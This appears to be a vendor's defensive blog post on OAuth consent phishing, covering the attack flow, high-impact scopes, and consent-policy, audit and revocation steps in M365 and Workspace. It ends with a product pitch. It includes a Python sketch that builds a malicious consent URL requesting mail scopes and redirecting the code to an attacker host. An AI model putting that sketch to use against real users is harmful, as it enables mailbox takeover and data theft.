OAuth Consent Phishing: The Attack FIDO2 Doesn't Stop

Most organizations that have moved off legacy MFA to phishing-resistant MFA (FIDO2, passkeys, WebAuthn) discover within the first 90 days that they still have an open phishing channel. That channel is OAuth consent phishing - an attack pattern that routes around the credential ceremony entirely. The user authenticates with a passkey, the cryptographic origin binding works exactly as designed, and then the user grants a malicious app permission to read their mail. No password was stolen. No MFA was bypassed. Yet the attacker has full API-level access to the victim's mailbox until an admin explicitly revokes the OAuth grant.

This post is for the IT director and the M365 / Workspace admin who has rolled out (or is rolling out) phishing-resistant MFA and needs to close the consent-phishing gap that the rollout exposes. It walks through what the attack is, why phishing-resistant MFA doesn't help, what the attacker gets, the configuration changes that close the channel in M365 and Workspace, and how to add consent-phishing simulation to a phishing program.

The mechanics of consent phishing

OAuth consent phishing exploits the legitimate OAuth 2.0 authorization flow. The attacker registers an OAuth application with the identity provider - Microsoft Entra, Google, Okta - using a name designed to look benign or familiar ("Microsoft Office" or "Google Productivity Suite" with subtle branding). The app's redirect URI is attacker-controlled.

The attacker then sends a phishing email containing a link to the OAuth authorization URL. The URL is genuine - it's the legitimate identity provider's consent endpoint - but parameterized to request high-impact scopes for the attacker's app. When the victim clicks, the identity provider authenticates them legitimately (passkey, MFA, whatever they have configured) and presents the standard consent screen: "{Attacker App Name} is requesting the following permissions: Read your mail, Send mail as you, Access your files...". The user clicks "Accept." The provider redirects to the attacker's URI with an authorization code, which the attacker exchanges for an access token and a refresh token. They now have API access to the victim's mailbox, files, calendar - whatever scopes were requested.

The user's credential is intact. The user's MFA factor is intact. The OAuth grant is the attack outcome. From the user's perspective, they completed a routine "this app needs permission" workflow they've seen many times.
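To make the parameterization concrete, here is a minimal Python sketch of how such an authorization URL is assembled. The client ID and redirect URI are placeholders for illustration; the point is that the hostname is the genuine Microsoft consent endpoint - only the query parameters belong to the attacker.

```python
from urllib.parse import urlencode

# Placeholder values for illustration: a real attack uses the attacker's
# registered app ID and an attacker-controlled redirect URI.
ATTACKER_CLIENT_ID = "00000000-0000-0000-0000-000000000000"
ATTACKER_REDIRECT = "https://attacker.example/callback"


def consent_url(client_id, redirect_uri, scopes):
    """Build a Microsoft identity platform authorization URL.

    The origin is the legitimate login.microsoftonline.com endpoint,
    so nothing here trips origin-bound MFA - the client_id, redirect_uri,
    and scope parameters are what point the grant at the attacker's app.
    """
    params = {
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": redirect_uri,
        "response_mode": "query",
        "scope": " ".join(scopes),
    }
    return ("https://login.microsoftonline.com/common/oauth2/v2.0/authorize?"
            + urlencode(params))


url = consent_url(ATTACKER_CLIENT_ID, ATTACKER_REDIRECT,
                  ["Mail.Read", "Mail.Send", "offline_access"])
```

Because the link really does resolve to the identity provider, URL-reputation checks and user "check the domain" habits both pass.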

Why phishing-resistant MFA doesn't help

Phishing-resistant MFA cryptographically binds the authentication challenge to the legitimate origin. The user's WebAuthn authenticator only signs challenges from accounts.google.com or login.microsoftonline.com - a phishing proxy on a different domain cannot complete the ceremony. This defeats AiTM reverse-proxy phishing decisively.

Consent phishing operates after authentication. The user signs in legitimately - WebAuthn ceremony succeeds, the IDP issues a session token, all controls fire correctly. Then the user encounters the consent screen for an OAuth app. Granting consent is a different code path. It doesn't re-invoke the authentication factor; the user clicks "Accept" and the IDP issues an OAuth authorization code to the configured redirect URI.

Phishing-resistant MFA is necessary but not sufficient. MFA-bypass phishing patterns that target the credential ceremony are defeated; consent phishing routes around the ceremony entirely. The defense layer for consent phishing is at the OAuth-policy layer, not the authentication layer.

What the attacker gets

It depends on which OAuth scopes were requested and granted. The high-impact scopes:

  • Mail.Read (M365) / https://www.googleapis.com/auth/gmail.readonly (Workspace) - Read all mailbox content. Exfiltrate communications, target executives' email for follow-on attacks, search for credentials, financial data, M&A discussions.
  • Mail.Send / gmail.send - Send email as the user. The attacker now has internal-phishing pivot capability. Email recipients see the legitimate user as sender; replies route to the attacker.
  • Files.ReadWrite.All / drive - Read and modify all SharePoint/OneDrive/Drive content. Exfiltrate files, plant malicious documents for downstream targeting.
  • offline_access - Refresh token persistence. The attacker's access survives the user changing their password. Revoking only the password does not revoke the OAuth grant.
  • User.Read.All / admin.directory.user.readonly - Full directory read. Reconnaissance for follow-on targeting (find executives, finance staff, IT admins).

The persistence point matters. Most account-takeover incident response playbooks assume password rotation revokes attacker access. With consent phishing, the attacker has API access via OAuth - independent of the password. Standard password rotation does not help. Revocation requires explicit admin action in Entra or Workspace admin to remove the OAuth grant.
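As a sketch of what explicit revocation involves on the Microsoft side, these are the two Microsoft Graph calls an incident-response playbook needs in addition to a password reset. This shows endpoint construction only - real calls require an admin token with the appropriate Graph permissions, and the user and grant IDs are placeholders.

```python
GRAPH = "https://graph.microsoft.com/v1.0"


def revocation_requests(user_id, grant_id):
    """Return the (method, URL) pairs an IR playbook must issue on top of
    a password reset to actually cut off an OAuth-based attacker."""
    return [
        # Delete the delegated permission grant itself - the step that
        # password rotation does NOT perform.
        ("DELETE", f"{GRAPH}/oauth2PermissionGrants/{grant_id}"),
        # Invalidate refresh tokens issued to applications for this user,
        # so tokens the attacker already holds stop refreshing.
        ("POST", f"{GRAPH}/users/{user_id}/revokeSignInSessions"),
    ]
```

Both steps matter: deleting the grant blocks future consent-based access, while revoking sessions invalidates the refresh token the attacker is already holding.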

Defense in M365

The single highest-leverage control: restrict user consent at Entra. Path: Microsoft Entra admin center > Enterprise Applications > Consent and permissions > User consent settings. The defaults vary by tenant age; modern tenants tend to default to "Allow user consent for apps." Change to:

  • Do not allow user consent - strictest. All OAuth grants require admin approval. Highest friction; requires admin-consent-request workflow to remain operationally viable.
  • Allow user consent for apps from verified publishers, for selected permissions - middle ground. Microsoft-verified publishers (Adobe, DocuSign, Salesforce) can be granted limited scopes by users; everything else requires admin review.

Combine with Application Consent Policies for fine-grained control over which scopes can be granted at user level. Audit existing OAuth grants regularly using the Microsoft Graph PowerShell module:

# Connect with read-only scopes sufficient to enumerate apps and grants
Connect-MgGraph -Scopes "Application.Read.All","Directory.Read.All"

# List service principals for apps integrated into the tenant
Get-MgServicePrincipal -Filter "tags/any(t:t eq 'WindowsAzureActiveDirectoryIntegratedApp')" | Select-Object DisplayName, AppId, Tags

# Rank apps by the number of delegated permission grants they hold
Get-MgOauth2PermissionGrant -All | Group-Object ClientId | Sort-Object Count -Descending

Microsoft Defender for Cloud Apps adds OAuth app discovery and risk scoring; it is worth enabling on any tenant licensed for E5 or the Defender for Cloud Apps SKU. The signal to watch: any new OAuth app receiving Mail.Read, Mail.Send, Files.ReadWrite.All, or offline_access without prior admin review is a high-priority investigation.
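Exported grant data can be triaged with a few lines of scripting. A minimal sketch follows (Python; the app-name/scope-string pairs are an assumed export format, e.g. flattened from the PowerShell audit output):

```python
# High-impact delegated scopes from the list above - any grant containing
# one of these deserves review.
HIGH_IMPACT = {
    "Mail.Read", "Mail.Send", "Files.ReadWrite.All",
    "offline_access", "User.Read.All",
}


def flag_risky_grants(grants):
    """Given (app_name, space-separated scope string) pairs, return a map
    of app name -> sorted list of high-impact scopes that app holds."""
    flagged = {}
    for app, scope_string in grants:
        risky = HIGH_IMPACT.intersection(scope_string.split())
        if risky:
            flagged[app] = sorted(risky)
    return flagged
```

Running this on a scheduled export turns "audit OAuth grants regularly" into a reviewable diff rather than a manual console crawl.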

Defense in Workspace

Path: Google Workspace Admin Console > Security > Access and data control > API controls > Manage Third-Party App Access. Configure:

  • Unconfigured third-party apps: set to "Don't trust." Default is "Trust" or "Limited" depending on tenant age. Untrusted means users cannot grant OAuth scopes to the app without admin approval.
  • Restricted Google services: set sensitive scopes (Gmail, Drive, Directory, Admin SDK) to require admin approval. Block all third-party API access for these services; user-level scope grants are admin-only.
  • App Access Control by domain: restrict to apps from approved publishers if your org has a vetted-app-list policy.

Workspace also offers a third-party app block list (manage by domain or app ID) and the unconfigured-app verification workflow (any new OAuth app surfaces as "unconfigured" until admin classifies it). The configuration is on the admin to lock down; the default is permissive.
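For auditing on the Workspace side, the Admin SDK Directory API exposes a per-user tokens resource that lists and revokes a user's OAuth grants. A sketch of the relevant endpoints (URL construction only; real calls require an admin credential authorized for the Directory API):

```python
ADMIN_API = "https://admin.googleapis.com/admin/directory/v1"


def token_audit_requests(user_key, client_id=None):
    """(method, URL) pairs against the Directory API 'tokens' resource:
    list a user's OAuth grants, and optionally revoke one by client ID."""
    reqs = [("GET", f"{ADMIN_API}/users/{user_key}/tokens")]
    if client_id:
        # Revoking by client ID is the Workspace equivalent of deleting
        # an OAuth grant in Entra - password resets don't do this.
        reqs.append(
            ("DELETE", f"{ADMIN_API}/users/{user_key}/tokens/{client_id}"))
    return reqs
```

This is the same audit-and-revoke loop as the Graph PowerShell commands on the M365 side, expressed against Google's API surface.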

Building admin-consent approval workflow

Restricting user consent shifts load to the admin team. If that team isn't equipped to handle approvals at scale, the restriction creates ticket volume that pressures rubber-stamping - which functionally undoes the control.

The workflow that makes restrictive consent operationally viable: a self-service portal where users request OAuth apps, listing the app, the requested scopes, and the business case. An admin reviews the scopes against the business need (Mail.Read for a productivity app is suspicious; Calendars.ReadWrite for a scheduling app is reasonable). Each approval or denial is logged. The portal is integrated with the IDP so that approval automatically grants the consent at the tenant level. This makes "no user consent" a workable default rather than a friction wall.
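The scope-vs-business-need review lends itself to a simple first-pass rule that routes clean requests to fast approval and surprising ones to a human. A sketch (Python; the category-to-expected-scopes table is an assumed, org-specific policy, not a vendor-provided list):

```python
# Assumed org policy: which scope families each app category may request.
EXPECTED_SCOPES = {
    "scheduling": {"Calendars.ReadWrite", "User.Read"},
    "productivity": {"User.Read", "Files.Read"},
}


def review_request(category, requested):
    """First-pass triage for an app-consent request.

    Returns ('approve', empty set) when every requested scope is expected
    for the app's category, else ('escalate', the unexpected scopes) so a
    human reviews exactly the surprising part.
    """
    expected = EXPECTED_SCOPES.get(category, set())
    unexpected = set(requested) - expected
    if unexpected:
        return ("escalate", unexpected)
    return ("approve", set())
```

The design point is that the admin never rubber-stamps a full scope list - escalations arrive pre-narrowed to the scopes that don't fit the app's stated purpose.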

Adding consent phishing to the simulation program

Most phishing simulation programs cover credential-harvest lures. They do not cover consent-phishing lures. The result: users have no recognition reflex for the consent-screen variant of the attack.

The simulation pattern: an email that looks like a productivity-app install prompt - "Your team has been invited to use Project Tracker - click to install" - with a button that links to a Bait & Phish-managed URL. The URL renders a visual replica of an OAuth consent page (not a real OAuth flow - no actual permissions granted). Track who clicked through to the consent page and who clicked "Accept" on the simulated page. Auto-assign remediation training for both populations - the click-through training covers "is this an unfamiliar app?" recognition; the click-accept training covers "should I be granting these scopes?" awareness.

Run quarterly. The recognition cue users build: "Is this an OAuth consent screen? For an app I recognize? Requesting only the scopes that app needs?" That cue translates directly to real-world resistance against the attack pattern.

Pulling it together

Phishing-resistant MFA closed the AiTM phishing channel. Consent phishing is one of the residual channels it does not close. The defense is at the OAuth-policy layer: restrict user consent at the IDP, build an admin-approval workflow that makes restriction operationally viable, audit OAuth grants on a continuous schedule and add consent-phishing-style simulation to the phishing program.

If you're rolling out phishing-resistant MFA and want to add consent-phishing simulation as the matched layer, start a free trial covering up to 25 users and run a hard-difficulty consent-phishing campaign this month. For full deployment scoping including M365 and Workspace consent-policy review, see pricing or contact us.

Related reading